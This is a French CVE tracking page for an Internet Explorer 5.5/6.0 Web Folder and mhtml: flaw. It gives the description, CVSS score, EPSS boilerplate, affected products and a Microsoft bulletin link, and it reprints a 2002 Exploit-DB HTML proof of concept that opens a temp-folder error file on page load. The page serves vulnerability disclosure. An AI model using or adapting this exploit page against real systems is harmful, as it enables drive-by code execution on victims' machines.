Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The Web Folder component for Internet Explorer 5.5 and 6.0 writes an error message to a known location in the temporary folder, which allows remote attackers to execute arbitrary code by injecting it into the error message, then referring to the error message file via a mhtml: URL.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 21711
Date de publication : 2002-08-14 22h00 +00:00
Auteur : http-equiv
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/5473/info
Microsoft Outlook Express introduced a URL handler called MHTML (MIME Encapsulation of Aggregate HTML). This allows Internet Explorer to pass MHTML files to Outlook Express for rendering.
The MHTML URL handler does not validate the file type it is rendering. This could allow a file type that is normally considered to be a "safe file type", such as a .txt file, to be opened and have any script contained within rendered. This script would then be rendered in the Local Computer Zone.
<html>
<head>
<title>malware.com</title>
<meta NAME="Author" CONTENT="malware.com">
<meta name="robots" content="noindex, nofollow">
</head>
<body onload=malware() style="behavior: url(#default#httpFolder);">
<script>
function malware(){
document.body.navigate("http://www.microsoft.com");alert("malware");
open("file://C%3A%5CWINDOWS%5CTemp%5Cwecerr.txt")
}
</script><br><br><br><br>
<center><image src="smile.gif"></center>
Products Mentioned
Configuraton 0
Microsoft>>Internet_explorer >> Version 5.5
- Microsoft>>Internet_explorer >> Version 5.5 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 5.5 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 5.5 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 5.5 (Open CPE detail)
Microsoft>>Internet_explorer >> Version 5.5
- Microsoft>>Internet_explorer >> Version 5.5 (Open CPE detail)
Microsoft>>Internet_explorer >> Version 5.5
- Microsoft>>Internet_explorer >> Version 5.5 (Open CPE detail)
Microsoft>>Internet_explorer >> Version 6.0
- Microsoft>>Internet_explorer >> Version 6.0 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 6.0 (Open CPE detail)
- Microsoft>>Internet_explorer >> Version 6.0 (Open CPE detail)
Références
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-014
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
